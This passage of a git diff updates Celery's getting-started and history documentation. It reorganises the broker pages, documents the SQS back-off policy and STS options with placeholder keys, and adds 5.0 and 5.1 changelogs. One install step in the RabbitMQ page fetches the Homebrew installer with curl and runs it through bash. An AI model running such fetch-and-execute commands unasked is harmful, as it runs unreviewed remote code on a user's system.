+.. _broker_toc:
+
+Broker Instructions
+===================
+
+.. toctree::
+ :maxdepth: 1
+
+ rabbitmq
+ redis
+ sqs
+
+.. _broker-overview:
+
+Broker Overview
+===============
+
+This is comparison table of the different transports supports,
+more information can be found in the documentation for each
+individual transport (see :ref:`broker_toc`).
+
++---------------+--------------+----------------+--------------------+
+| **Name** | **Status** | **Monitoring** | **Remote Control** |
++---------------+--------------+----------------+--------------------+
+| *RabbitMQ* | Stable | Yes | Yes |
++---------------+--------------+----------------+--------------------+
+| *Redis* | Stable | Yes | Yes |
++---------------+--------------+----------------+--------------------+
+| *Amazon SQS* | Stable | No | No |
++---------------+--------------+----------------+--------------------+
+| *Zookeeper* | Experimental | No | No |
++---------------+--------------+----------------+--------------------+
+
+Experimental brokers may be functional but they don't have
+dedicated maintainers.
+
+Missing monitor support means that the transport doesn't
+implement events, and as such Flower, `celery events`, `celerymon`
+and other event-based monitoring tools won't work.
+
+Remote control means the ability to inspect and manage workers
+at runtime using the `celery inspect` and `celery control` commands
+(and other tools using the remote control API).
+
+Summaries
+=========
+
+*Note: This section is not comprehensive of backends and brokers.*
+
+Celery has the ability to communicate and store with many different backends (Result Stores) and brokers (Message Transports).
+
+Redis
+-----
+
+Redis can be both a backend and a broker.
+
+**As a Broker:** Redis works well for rapid transport of small messages. Large messages can congest the system.
+
+:ref:`See documentation for details `
+
+**As a Backend:** Redis is a super fast K/V store, making it very efficient for fetching the results of a task call. As with the design of Redis, you do have to consider the limit memory available to store your data, and how you handle data persistence. If result persistence is important, consider using another DB for your backend.
+
+RabbitMQ
+--------
+
+RabbitMQ is a broker.
+
+**As a Broker:** RabbitMQ handles larger messages better than Redis, however if many messages are coming in very quickly, scaling can become a concern and Redis or SQS should be considered unless RabbitMQ is running at very large scale.
+
+:ref:`See documentation for details `
+
+**As a Backend:** RabbitMQ can store results via ``rpc://`` backend. This backend creates separate temporary queue for each client.
+
+*Note: RabbitMQ (as the broker) and Redis (as the backend) are very commonly used together. If more guaranteed long-term persistence is needed from the result store, consider using PostgreSQL or MySQL (through SQLAlchemy), Cassandra, or a custom defined backend.*
+
+SQS
+---
+
+SQS is a broker.
+
+If you already integrate tightly with AWS, and are familiar with SQS, it presents a great option as a broker. It is extremely scalable and completely managed, and manages task delegation similarly to RabbitMQ. It does lack some of the features of the RabbitMQ broker such as ``worker remote control commands``.
+
+:ref:`See documentation for details `
+
+SQLAlchemy
+----------
+
+SQLAlchemy is backend.
+
+It allows Celery to interface with MySQL, PostgreSQL, SQlite, and more. It is a ORM, and is the way Celery can use a SQL DB as a result backend. Historically, SQLAlchemy has not been the most stable result backend so if chosen one should proceed with caution.
diff --git a/docs/getting-started/brokers/rabbitmq.rst b/docs/getting-started/backends-and-brokers/rabbitmq.rst
similarity index 98%
rename from docs/getting-started/brokers/rabbitmq.rst
rename to docs/getting-started/backends-and-brokers/rabbitmq.rst
index 6f5d95dd8ab..430844bdfec 100644
--- a/docs/getting-started/brokers/rabbitmq.rst
+++ b/docs/getting-started/backends-and-brokers/rabbitmq.rst
@@ -86,7 +86,7 @@ documentation`_:
.. code-block:: console
- ruby -e "$(curl -fsSL https://raw.github.com/Homebrew/homebrew/go/install)"
+ /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
Finally, we can install RabbitMQ using :command:`brew`:
diff --git a/docs/getting-started/brokers/redis.rst b/docs/getting-started/backends-and-brokers/redis.rst
similarity index 96%
rename from docs/getting-started/brokers/redis.rst
rename to docs/getting-started/backends-and-brokers/redis.rst
index ba4b31aa9bd..9d42397de57 100644
--- a/docs/getting-started/brokers/redis.rst
+++ b/docs/getting-started/backends-and-brokers/redis.rst
@@ -58,6 +58,12 @@ It is also easy to connect directly to a list of Redis Sentinel:
app.conf.broker_url = 'sentinel://localhost:26379;sentinel://localhost:26380;sentinel://localhost:26381'
app.conf.broker_transport_options = { 'master_name': "cluster1" }
+Additional options can be passed to the Sentinel client using ``sentinel_kwargs``:
+
+.. code-block:: python
+
+ app.conf.broker_transport_options = { 'sentinel_kwargs': { 'password': "password" } }
+
.. _redis-visibility_timeout:
Visibility Timeout
diff --git a/docs/getting-started/brokers/sqs.rst b/docs/getting-started/backends-and-brokers/sqs.rst
similarity index 65%
rename from docs/getting-started/brokers/sqs.rst
rename to docs/getting-started/backends-and-brokers/sqs.rst
index 5b108cdc048..cd8fd2a3b33 100644
--- a/docs/getting-started/brokers/sqs.rst
+++ b/docs/getting-started/backends-and-brokers/sqs.rst
@@ -82,7 +82,7 @@ This option is set via the :setting:`broker_transport_options` setting::
broker_transport_options = {'visibility_timeout': 3600} # 1 hour.
-The default visibility timeout is 30 seconds.
+The default visibility timeout is 30 minutes.
Polling Interval
----------------
@@ -137,7 +137,7 @@ Predefined Queues
If you want Celery to use a set of predefined queues in AWS, and to
never attempt to list SQS queues, nor attempt to create or delete them,
-pass a map of queue names to URLs using the :setting:`predefined_queue_urls`
+pass a map of queue names to URLs using the :setting:`predefined_queues`
setting::
broker_transport_options = {
@@ -150,6 +150,70 @@ setting::
}
}
+Back-off policy
+------------------------
+Back-off policy is using SQS visibility timeout mechanism altering the time difference between task retries.
+The mechanism changes message specific ``visibility timeout`` from queue ``Default visibility timeout`` to policy configured timeout.
+The number of retries is managed by SQS (specifically by the ``ApproximateReceiveCount`` message attribute) and no further action is required by the user.
+
+Configuring the queues and backoff policy::
+
+ broker_transport_options = {
+ 'predefined_queues': {
+ 'my-q': {
+ 'url': 'https://ap-southeast-2.queue.amazonaws.com/123456/my-q',
+ 'access_key_id': 'xxx',
+ 'secret_access_key': 'xxx',
+ 'backoff_policy': {1: 10, 2: 20, 3: 40, 4: 80, 5: 320, 6: 640},
+ 'backoff_tasks': ['svc.tasks.tasks.task1']
+ }
+ }
+ }
+
+
+``backoff_policy`` dictionary where key is number of retries, and value is delay seconds between retries (i.e
+SQS visibility timeout)
+``backoff_tasks`` list of task names to apply the above policy
+
+The above policy:
+
++-----------------------------------------+--------------------------------------------+
+| **Attempt** | **Delay** |
++-----------------------------------------+--------------------------------------------+
+| ``2nd attempt`` | 20 seconds |
++-----------------------------------------+--------------------------------------------+
+| ``3rd attempt`` | 40 seconds |
++-----------------------------------------+--------------------------------------------+
+| ``4th attempt`` | 80 seconds |
++-----------------------------------------+--------------------------------------------+
+| ``5th attempt`` | 320 seconds |
++-----------------------------------------+--------------------------------------------+
+| ``6th attempt`` | 640 seconds |
++-----------------------------------------+--------------------------------------------+
+
+
+STS token authentication
+----------------------------
+
+https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role.html
+
+AWS STS authentication is supported by using the ``sts_role_arn`` and ``sts_token_timeout`` broker transport options. ``sts_role_arn`` is the assumed IAM role ARN we use to authorize our access to SQS.
+``sts_token_timeout`` is the token timeout, defaults (and minimum) to 900 seconds. After the mentioned period, a new token will be created.
+
+ broker_transport_options = {
+ 'predefined_queues': {
+ 'my-q': {
+ 'url': 'https://ap-southeast-2.queue.amazonaws.com/123456/my-q',
+ 'access_key_id': 'xxx',
+ 'secret_access_key': 'xxx',
+ 'backoff_policy': {1: 10, 2: 20, 3: 40, 4: 80, 5: 320, 6: 640},
+ 'backoff_tasks': ['svc.tasks.tasks.task1']
+ }
+ },
+ 'sts_role_arn': 'arn:aws:iam:::role/STSTest', # optional
+ 'sts_token_timeout': 900 # optional
+ }
+
.. _sqs-caveats:
diff --git a/docs/getting-started/brokers/index.rst b/docs/getting-started/brokers/index.rst
deleted file mode 100644
index 0a2b6a78741..00000000000
--- a/docs/getting-started/brokers/index.rst
+++ /dev/null
@@ -1,54 +0,0 @@
-.. _brokers:
-
-=====================
- Brokers
-=====================
-
-:Release: |version|
-:Date: |today|
-
-Celery supports several message transport alternatives.
-
-.. _broker_toc:
-
-Broker Instructions
-===================
-
-.. toctree::
- :maxdepth: 1
-
- rabbitmq
- redis
- sqs
-
-.. _broker-overview:
-
-Broker Overview
-===============
-
-This is comparison table of the different transports supports,
-more information can be found in the documentation for each
-individual transport (see :ref:`broker_toc`).
-
-+---------------+--------------+----------------+--------------------+
-| **Name** | **Status** | **Monitoring** | **Remote Control** |
-+---------------+--------------+----------------+--------------------+
-| *RabbitMQ* | Stable | Yes | Yes |
-+---------------+--------------+----------------+--------------------+
-| *Redis* | Stable | Yes | Yes |
-+---------------+--------------+----------------+--------------------+
-| *Amazon SQS* | Stable | No | No |
-+---------------+--------------+----------------+--------------------+
-| *Zookeeper* | Experimental | No | No |
-+---------------+--------------+----------------+--------------------+
-
-Experimental brokers may be functional but they don't have
-dedicated maintainers.
-
-Missing monitor support means that the transport doesn't
-implement events, and as such Flower, `celery events`, `celerymon`
-and other event-based monitoring tools won't work.
-
-Remote control means the ability to inspect and manage workers
-at runtime using the `celery inspect` and `celery control` commands
-(and other tools using the remote control API).
diff --git a/docs/getting-started/first-steps-with-celery.rst b/docs/getting-started/first-steps-with-celery.rst
index f3b80c42dbe..a87af8f7201 100644
--- a/docs/getting-started/first-steps-with-celery.rst
+++ b/docs/getting-started/first-steps-with-celery.rst
@@ -141,7 +141,7 @@ This is only needed so that names can be automatically generated when the tasks
defined in the `__main__` module.
The second argument is the broker keyword argument, specifying the URL of the
-message broker you want to use. Here using RabbitMQ (also the default option).
+message broker you want to use. Here we are using RabbitMQ (also the default option).
See :ref:`celerytut-broker` above for more choices --
for RabbitMQ you can use ``amqp://localhost``, or for Redis you can
@@ -159,7 +159,7 @@ argument:
.. code-block:: console
- $ celery -A tasks worker --loglevel=info
+ $ celery -A tasks worker --loglevel=INFO
.. note::
@@ -181,7 +181,7 @@ There are also several other commands available, and help is also available:
.. code-block:: console
- $ celery help
+ $ celery --help
.. _`supervisord`: http://supervisord.org
@@ -229,7 +229,8 @@ and -- or you can define your own.
For this example we use the `rpc` result backend, that sends states
back as transient messages. The backend is specified via the ``backend`` argument to
:class:`@Celery`, (or via the :setting:`result_backend` setting if
-you choose to use a configuration module):
+you choose to use a configuration module). So, you can modify this line in the `tasks.py`
+file to enable the `rpc://` backend:
.. code-block:: python
@@ -244,12 +245,13 @@ the message broker (a popular combination):
To read more about result backends please see :ref:`task-result-backends`.
-Now with the result backend configured, let's call the task again.
-This time you'll hold on to the :class:`~@AsyncResult` instance returned
-when you call a task:
+Now with the result backend configured, close the current python session and import the
+``tasks`` module again to put the changes into effect. This time you'll hold on to the
+:class:`~@AsyncResult` instance returned when you call a task:
.. code-block:: pycon
+ >>> from tasks import add # close and reopen to get updated 'app'
>>> result = add.delay(4, 4)
The :meth:`~@AsyncResult.ready` method returns whether the task
diff --git a/docs/getting-started/index.rst b/docs/getting-started/index.rst
index b590a18d53d..083ccb026f7 100644
--- a/docs/getting-started/index.rst
+++ b/docs/getting-started/index.rst
@@ -9,7 +9,7 @@
:maxdepth: 2
introduction
- brokers/index
+ backends-and-brokers/index
first-steps-with-celery
next-steps
resources
diff --git a/docs/getting-started/introduction.rst b/docs/getting-started/introduction.rst
index ea2162467ae..2797ce60097 100644
--- a/docs/getting-started/introduction.rst
+++ b/docs/getting-started/introduction.rst
@@ -39,13 +39,16 @@ What do I need?
===============
.. sidebar:: Version Requirements
- :subtitle: Celery version 5.0 runs on
+ :subtitle: Celery version 5.2 runs on
- - Python ❨3.6, 3.7, 3.8❩
- - PyPy3.6 ❨7.3❩
+ - Python ❨3.7, 3.8, 3.9, 3.10❩
+ - PyPy3.7, 3.8 ❨7.3.7❩
Celery 4.x was the last version to support Python 2.7,
- Celery 5.x requires Python 3.6 or newer is required.
+ Celery 5.x requires Python 3.6 or newer.
+ Celery 5.1.x also requires Python 3.6 or newer.
+ Celery 5.2.x requires Python 3.7 or newer.
+
If you're running an older version of Python, you need to be running
an older version of Celery:
diff --git a/docs/getting-started/next-steps.rst b/docs/getting-started/next-steps.rst
index 1cf0b35f714..d919d0e57c5 100644
--- a/docs/getting-started/next-steps.rst
+++ b/docs/getting-started/next-steps.rst
@@ -74,7 +74,7 @@ The :program:`celery` program can be used to start the worker (you need to run t
.. code-block:: console
- $ celery -A proj worker -l info
+ $ celery -A proj worker -l INFO
When the worker starts you should see a banner and some messages::
@@ -152,7 +152,7 @@ start one or more workers in the background:
.. code-block:: console
- $ celery multi start w1 -A proj -l info
+ $ celery multi start w1 -A proj -l INFO
celery multi v4.0.0 (latentcall)
> Starting nodes...
> w1.halcyon.local: OK
@@ -161,7 +161,7 @@ You can restart it too:
.. code-block:: console
- $ celery multi restart w1 -A proj -l info
+ $ celery multi restart w1 -A proj -l INFO
celery multi v4.0.0 (latentcall)
> Stopping nodes...
> w1.halcyon.local: TERM -> 64024
@@ -176,7 +176,7 @@ or stop it:
.. code-block:: console
- $ celery multi stop w1 -A proj -l info
+ $ celery multi stop w1 -A proj -l INFO
The ``stop`` command is asynchronous so it won't wait for the
worker to shutdown. You'll probably want to use the ``stopwait`` command
@@ -185,7 +185,7 @@ before exiting:
.. code-block:: console
- $ celery multi stopwait w1 -A proj -l info
+ $ celery multi stopwait w1 -A proj -l INFO
.. note::
@@ -202,7 +202,7 @@ you're encouraged to put these in a dedicated directory:
$ mkdir -p /var/run/celery
$ mkdir -p /var/log/celery
- $ celery multi start w1 -A proj -l info --pidfile=/var/run/celery/%n.pid \
+ $ celery multi start w1 -A proj -l INFO --pidfile=/var/run/celery/%n.pid \
--logfile=/var/log/celery/%n%I.log
With the multi command you can start multiple workers, and there's a powerful
@@ -211,7 +211,7 @@ for example:
.. code-block:: console
- $ celery multi start 10 -A proj -l info -Q:1-3 images,video -Q:4,5 data \
+ $ celery multi start 10 -A proj -l INFO -Q:1-3 images,video -Q:4,5 data \
-Q default -L:4,5 debug
For more examples see the :mod:`~celery.bin.multi` module in the API
@@ -766,13 +766,6 @@ If you have strict fair scheduling requirements, or want to optimize
for throughput then you should read the :ref:`Optimizing Guide
`.
-If you're using RabbitMQ then you can install the :pypi:`librabbitmq`
-module, an AMQP client implemented in C:
-
-.. code-block:: console
-
- $ pip install librabbitmq
-
What to do now?
===============
diff --git a/docs/history/changelog-4.4.rst b/docs/history/changelog-4.4.rst
index 506672c4f0a..e6a851676cd 100644
--- a/docs/history/changelog-4.4.rst
+++ b/docs/history/changelog-4.4.rst
@@ -25,7 +25,7 @@ an overview of what's new in Celery 4.4.
- Fix REMAP_SIGTERM=SIGQUIT not working
- (Fixes#6258) MongoDB: fix for serialization issue (#6259)
- Make use of ordered sets in Redis opt-in
-- Test, CI, Docker & style and minor doc impovements.
+- Test, CI, Docker & style and minor doc improvements.
4.4.6
=======
diff --git a/docs/history/changelog-5.0.rst b/docs/history/changelog-5.0.rst
new file mode 100644
index 00000000000..78832a373dc
--- /dev/null
+++ b/docs/history/changelog-5.0.rst
@@ -0,0 +1,173 @@
+================
+ Change history
+================
+
+This document contains change notes for bugfix & new features
+in the 5.0.x , please see :ref:`whatsnew-5.0` for
+an overview of what's new in Celery 5.0.
+
+.. _version-5.0.6:
+
+5.0.6
+=====
+:release-date: 2021-06-28 3.00 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Inspect commands accept arguments again (#6710).
+- The :setting:`worker_pool` setting is now respected correctly (#6711).
+- Ensure AMQPContext exposes an app attribute (#6741).
+- Exit celery with non zero exit value if failing (#6602).
+- --quiet flag now actually makes celery avoid producing logs (#6599).
+- pass_context for handle_preload_options decorator (#6583).
+- Fix --pool=threads support in command line options parsing (#6787).
+Fix the behavior of our json serialization which regressed in 5.0 (#6561).
+- celery -A app events -c camera now works as expected (#6774).
+
+.. _version-5.0.5:
+
+5.0.5
+=====
+:release-date: 2020-12-16 5.35 P.M UTC+2:00
+:release-by: Omer Katz
+
+- Ensure keys are strings when deleting results from S3 (#6537).
+- Fix a regression breaking `celery --help` and `celery events` (#6543).
+
+.. _version-5.0.4:
+
+5.0.4
+=====
+:release-date: 2020-12-08 2.40 P.M UTC+2:00
+:release-by: Omer Katz
+
+- DummyClient of cache+memory:// backend now shares state between threads (#6524).
+
+ This fixes a problem when using our pytest integration with the in memory
+ result backend.
+ Because the state wasn't shared between threads, #6416 results in test suites
+ hanging on `result.get()`.
+
+.. _version-5.0.3:
+
+5.0.3
+=====
+:release-date: 2020-12-03 6.30 P.M UTC+2:00
+:release-by: Omer Katz
+
+- Make `--workdir` eager for early handling (#6457).
+- When using the MongoDB backend, don't cleanup if result_expires is 0 or None (#6462).
+- Fix passing queues into purge command (#6469).
+- Restore `app.start()` and `app.worker_main()` (#6481).
+- Detaching no longer creates an extra log file (#6426).
+- Result backend instances are now thread local to ensure thread safety (#6416).
+- Don't upgrade click to 8.x since click-repl doesn't support it yet.
+- Restore preload options (#6516).
+
+.. _version-5.0.2:
+
+5.0.2
+=====
+:release-date: 2020-11-02 8.00 P.M UTC+2:00
+:release-by: Omer Katz
+
+- Fix _autodiscover_tasks_from_fixups (#6424).
+- Flush worker prints, notably the banner (#6432).
+- **Breaking Change**: Remove `ha_policy` from queue definition. (#6440)
+
+ This argument has no effect since RabbitMQ 3.0.
+ Therefore, We feel comfortable dropping it in a patch release.
+
+- Python 3.9 support (#6418).
+- **Regression**: When using the prefork pool, pick the fair scheduling strategy by default (#6447).
+- Preserve callbacks when replacing a task with a chain (#6189).
+- Fix max_retries override on `self.retry()` (#6436).
+- Raise proper error when replacing with an empty chain (#6452)
+
+.. _version-5.0.1:
+
+5.0.1
+=====
+:release-date: 2020-10-18 1.00 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Specify UTF-8 as the encoding for log files (#6357).
+- Custom headers now propagate when using the protocol 1 hybrid messages (#6374).
+- Retry creating the database schema for the database results backend
+ in case of a race condition (#6298).
+- When using the Redis results backend, awaiting for a chord no longer hangs
+ when setting :setting:`result_expires` to 0 (#6373).
+- When a user tries to specify the app as an option for the subcommand,
+ a custom error message is displayed (#6363).
+- Fix the `--without-gossip`, `--without-mingle`, and `--without-heartbeat`
+ options which now work as expected. (#6365)
+- Provide a clearer error message when the application cannot be loaded.
+- Avoid printing deprecation warnings for settings when they are loaded from
+ Django settings (#6385).
+- Allow lowercase log levels for the `--loglevel` option (#6388).
+- Detaching now works as expected (#6401).
+- Restore broadcasting messages from `celery control` (#6400).
+- Pass back real result for single task chains (#6411).
+- Ensure group tasks a deeply serialized (#6342).
+- Fix chord element counting (#6354).
+- Restore the `celery shell` command (#6421).
+
+.. _version-5.0.0:
+
+5.0.0
+=====
+:release-date: 2020-09-24 6.00 P.M UTC+3:00
+:release-by: Omer Katz
+
+- **Breaking Change** Remove AMQP result backend (#6360).
+- Warn when deprecated settings are used (#6353).
+- Expose retry_policy for Redis result backend (#6330).
+- Prepare Celery to support the yet to be released Python 3.9 (#6328).
+
+5.0.0rc3
+========
+:release-date: 2020-09-07 4.00 P.M UTC+3:00
+:release-by: Omer Katz
+
+- More cleanups of leftover Python 2 support (#6338).
+
+5.0.0rc2
+========
+:release-date: 2020-09-01 6.30 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Bump minimum required eventlet version to 0.26.1.
+- Update Couchbase Result backend to use SDK V3.
+- Restore monkeypatching when gevent or eventlet are used.
+
+5.0.0rc1
+========
+:release-date: 2020-08-24 9.00 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Allow to opt out of ordered group results when using the Redis result backend (#6290).
+- **Breaking Change** Remove the deprecated celery.utils.encoding module.
+
+5.0.0b1
+=======
+:release-date: 2020-08-19 8.30 P.M UTC+3:00
+:release-by: Omer Katz
+
+- **Breaking Change** Drop support for the Riak result backend (#5686).
+- **Breaking Change** pytest plugin is no longer enabled by default (#6288).
+ Install pytest-celery to enable it.
+- **Breaking Change** Brand new CLI based on Click (#5718).
+
+5.0.0a2
+=======
+:release-date: 2020-08-05 7.15 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Bump Kombu version to 5.0 (#5686).
+
+5.0.0a1
+=======
+:release-date: 2020-08-02 9.30 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Removed most of the compatibility code that supports Python 2 (#5686).
+- Modernized code to work on Python 3.6 and above (#5686).
diff --git a/docs/history/changelog-5.1.rst b/docs/history/changelog-5.1.rst
new file mode 100644
index 00000000000..5b724b1536d
--- /dev/null
+++ b/docs/history/changelog-5.1.rst
@@ -0,0 +1,139 @@
+.. _changelog:
+
+================
+ Change history
+================
+
+This document contains change notes for bugfix & new features
+in the & 5.1.x series, please see :ref:`whatsnew-5.1` for
+an overview of what's new in Celery 5.1.
+
+.. version-5.1.2:
+
+5.1.2
+=====
+:release-date: 2021-06-28 16.15 P.M UTC+3:00
+:release-by: Omer Katz
+
+- When chords fail, correctly call errbacks. (#6814)
+
+ We had a special case for calling errbacks when a chord failed which
+ assumed they were old style. This change ensures that we call the proper
+ errback dispatch method which understands new and old style errbacks,
+ and adds test to confirm that things behave as one might expect now.
+- Avoid using the ``Event.isSet()`` deprecated alias. (#6824)
+- Reintroduce sys.argv default behaviour for ``Celery.start()``. (#6825)
+
+.. version-5.1.1:
+
+5.1.1
+=====
+:release-date: 2021-06-17 16.10 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Fix ``--pool=threads`` support in command line options parsing. (#6787)
+- Fix ``LoggingProxy.write()`` return type. (#6791)
+- Couchdb key is now always coerced into a string. (#6781)
+- grp is no longer imported unconditionally. (#6804)
+ This fixes a regression in 5.1.0 when running Celery in non-unix systems.
+- Ensure regen utility class gets marked as done when concertised. (#6789)
+- Preserve call/errbacks of replaced tasks. (#6770)
+- Use single-lookahead for regen consumption. (#6799)
+- Revoked tasks are no longer incorrectly marked as retried. (#6812, #6816)
+
+.. version-5.1.0:
+
+5.1.0
+=====
+:release-date: 2021-05-23 19.20 P.M UTC+3:00
+:release-by: Omer Katz
+
+- ``celery -A app events -c camera`` now works as expected. (#6774)
+- Bump minimum required Kombu version to 5.1.0.
+
+.. _version-5.1.0rc1:
+
+5.1.0rc1
+========
+:release-date: 2021-05-02 16.06 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Celery Mailbox accept and serializer parameters are initialized from configuration. (#6757)
+- Error propagation and errback calling for group-like signatures now works as expected. (#6746)
+- Fix sanitization of passwords in sentinel URIs. (#6765)
+- Add LOG_RECEIVED to customize logging. (#6758)
+
+.. _version-5.1.0b2:
+
+5.1.0b2
+=======
+:release-date: 2021-05-02 16.06 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Fix the behavior of our json serialization which regressed in 5.0. (#6561)
+- Add support for SQLAlchemy 1.4. (#6709)
+- Safeguard against schedule entry without kwargs. (#6619)
+- ``task.apply_async(ignore_result=True)`` now avoids persisting the results. (#6713)
+- Update systemd tmpfiles path. (#6688)
+- Ensure AMQPContext exposes an app attribute. (#6741)
+- Inspect commands accept arguments again (#6710).
+- Chord counting of group children is now accurate. (#6733)
+- Add a setting :setting:`worker_cancel_long_running_tasks_on_connection_loss`
+ to terminate tasks with late acknowledgement on connection loss. (#6654)
+- The ``task-revoked`` event and the ``task_revoked`` signal are not duplicated
+ when ``Request.on_failure`` is called. (#6654)
+- Restore pickling support for ``Retry``. (#6748)
+- Add support in the redis result backend for authenticating with a username. (#6750)
+- The :setting:`worker_pool` setting is now respected correctly. (#6711)
+
+.. _version-5.1.0b1:
+
+5.1.0b1
+=======
+:release-date: 2021-04-02 10.25 P.M UTC+6:00
+:release-by: Asif Saif Uddin
+
+- Add sentinel_kwargs to Redis Sentinel docs.
+- Depend on the maintained python-consul2 library. (#6544).
+- Use result_chord_join_timeout instead of hardcoded default value.
+- Upgrade AzureBlockBlob storage backend to use Azure blob storage library v12 (#6580).
+- Improved integration tests.
+- pass_context for handle_preload_options decorator (#6583).
+- Makes regen less greedy (#6589).
+- Pytest worker shutdown timeout (#6588).
+- Exit celery with non zero exit value if failing (#6602).
+- Raise BackendStoreError when set value is too large for Redis.
+- Trace task optimizations are now set via Celery app instance.
+- Make trace_task_ret and fast_trace_task public.
+- reset_worker_optimizations and create_request_cls has now app as optional parameter.
+- Small refactor in exception handling of on_failure (#6633).
+- Fix for issue #5030 "Celery Result backend on Windows OS".
+- Add store_eager_result setting so eager tasks can store result on the result backend (#6614).
+- Allow heartbeats to be sent in tests (#6632).
+- Fixed default visibility timeout note in sqs documentation.
+- Support Redis Sentinel with SSL.
+- Simulate more exhaustive delivery info in apply().
+- Start chord header tasks as soon as possible (#6576).
+- Forward shadow option for retried tasks (#6655).
+- --quiet flag now actually makes celery avoid producing logs (#6599).
+- Update platforms.py "superuser privileges" check (#6600).
+- Remove unused property `autoregister` from the Task class (#6624).
+- fnmatch.translate() already translates globs for us. (#6668).
+- Upgrade some syntax to Python 3.6+.
+- Add `azureblockblob_base_path` config (#6669).
+- Fix checking expiration of X.509 certificates (#6678).
+- Drop the lzma extra.
+- Fix JSON decoding errors when using MongoDB as backend (#6675).
+- Allow configuration of RedisBackend's health_check_interval (#6666).
+- Safeguard against schedule entry without kwargs (#6619).
+- Docs only - SQS broker - add STS support (#6693) through kombu.
+- Drop fun_accepts_kwargs backport.
+- Tasks can now have required kwargs at any order (#6699).
+- Min py-amqp 5.0.6.
+- min billiard is now 3.6.4.0.
+- Minimum kombu now is5.1.0b1.
+- Numerous docs fixes.
+- Moved CI to github action.
+- Updated deployment scripts.
+- Updated docker.
+- Initial support of python 3.9 added.
diff --git a/docs/history/index.rst b/docs/history/index.rst
index 05dd08a17dc..35423550084 100644
--- a/docs/history/index.rst
+++ b/docs/history/index.rst
@@ -13,6 +13,10 @@ version please visit :ref:`changelog`.
.. toctree::
:maxdepth: 2
+ whatsnew-5.1
+ changelog-5.1
+ whatsnew-5.0
+ changelog-5.0
whatsnew-4.4
changelog-4.4
whatsnew-4.3
diff --git a/docs/history/whatsnew-3.0.rst b/docs/history/whatsnew-3.0.rst
index 3b06ab91d14..7abd3229bac 100644
--- a/docs/history/whatsnew-3.0.rst
+++ b/docs/history/whatsnew-3.0.rst
@@ -524,7 +524,7 @@ stable and is now documented as part of the official API.
.. code-block:: pycon
>>> celery.control.pool_grow(2, destination=['w1.example.com'])
- >>> celery.contorl.pool_shrink(2, destination=['w1.example.com'])
+ >>> celery.control.pool_shrink(2, destination=['w1.example.com'])
or using the :program:`celery control` command:
diff --git a/docs/history/whatsnew-4.4.rst b/docs/history/whatsnew-4.4.rst
index 1f252de30a5..24b4ac61b3b 100644
--- a/docs/history/whatsnew-4.4.rst
+++ b/docs/history/whatsnew-4.4.rst
@@ -51,7 +51,7 @@ This release has been codenamed `Cliffs ` for details.
Click provides shell completion `out of the box `_.
This functionality replaces our previous bash completion script and adds
@@ -279,7 +299,7 @@ Starting from Celery 5.0, the pytest plugin is no longer enabled by default.
Please refer to the :ref:`documentation ` for instructions.
Ordered Group Results for the Redis Result Backend
--------------------------------------------------
+--------------------------------------------------
Previously group results were not ordered by their invocation order.
Celery 4.4.7 introduced an opt-in feature to make them ordered.
@@ -287,7 +307,7 @@ Celery 4.4.7 introduced an opt-in feature to make them ordered.
It is now an opt-out behavior.
If you were previously using the Redis result backend, you might need to
-out-out of this behavior.
+opt-out of this behavior.
Please refer to the :ref:`documentation `
for instructions on how to disable this feature.
diff --git a/docs/history/whatsnew-5.1.rst b/docs/history/whatsnew-5.1.rst
new file mode 100644
index 00000000000..a1c7416cdda
--- /dev/null
+++ b/docs/history/whatsnew-5.1.rst
@@ -0,0 +1,419 @@
+.. _whatsnew-5.1:
+
+=========================================
+ What's new in Celery 5.1 (Sun Harmonics)
+=========================================
+:Author: Josue Balandrano Coronel (``jbc at rmcomplexity.com``)
+
+.. sidebar:: Change history
+
+ What's new documents describe the changes in major versions,
+ we also have a :ref:`changelog` that lists the changes in bugfix
+ releases (0.0.x), while older series are archived under the :ref:`history`
+ section.
+
+Celery is a simple, flexible, and reliable distributed programming framework
+to process vast amounts of messages, while providing operations with
+the tools required to maintain a distributed system with python.
+
+It's a task queue with focus on real-time processing, while also
+supporting task scheduling.
+
+Celery has a large and diverse community of users and contributors,
+you should come join us :ref:`on IRC `
+or :ref:`our mailing-list `.
+
+To read more about Celery you should go read the :ref:`introduction `.
+
+While this version is **mostly** backward compatible with previous versions
+it's important that you read the following section as this release
+is a new major version.
+
+This version is officially supported on CPython 3.6, 3.7 & 3.8 & 3.9
+and is also supported on PyPy3.
+
+.. _`website`: http://celeryproject.org/
+
+.. topic:: Table of Contents
+
+ Make sure you read the important notes before upgrading to this version.
+
+.. contents::
+ :local:
+ :depth: 2
+
+Preface
+=======
+
+The 5.1.0 release is a new minor release for Celery.
+
+Starting from now users should expect more frequent releases of major versions
+as we move fast and break things to bring you even better experience.
+
+Releases in the 5.x series are codenamed after songs of `Jon Hopkins `_.
+This release has been codenamed `Sun Harmonics `_.
+
+From now on we only support Python 3.6 and above.
+We will maintain compatibility with Python 3.6 until it's
+EOL in December, 2021.
+
+*— Omer Katz*
+
+Long Term Support Policy
+------------------------
+
+As we'd like to provide some time for you to transition,
+we're designating Celery 4.x an LTS release.
+Celery 4.x will be supported until the 1st of August, 2021.
+
+We will accept and apply patches for bug fixes and security issues.
+However, no new features will be merged for that version.
+
+Celery 5.x **is not** an LTS release. We will support it until the release
+of Celery 6.x.
+
+We're in the process of defining our Long Term Support policy.
+Watch the next "What's New" document for updates.
+
+Wall of Contributors
+--------------------
+
+0xflotus <0xflotus@gmail.com>
+AbdealiJK
+Anatoliy
+Anna Borzenko
+aruseni
+Asif Saif Uddin (Auvi)
+Asif Saif Uddin
+Awais Qureshi
+careljonkhout
+Christian Clauss
+danthegoodman1
+Dave Johansen
+David Schneider
+Fahmi
+Felix Yan
+Gabriel Augendre
+galcohen
+gal cohen
+Geunsik Lim
+Guillaume DE SUSANNE D'EPINAY
+Hilmar Hilmarsson
+Illia Volochii
+jenhaoyang
+Jonathan Stoppani
+Josue Balandrano Coronel
+kosarchuksn
+Kostya Deev
+Matt Hoffman
+Matus Valo
+Myeongseok Seo
+Noam
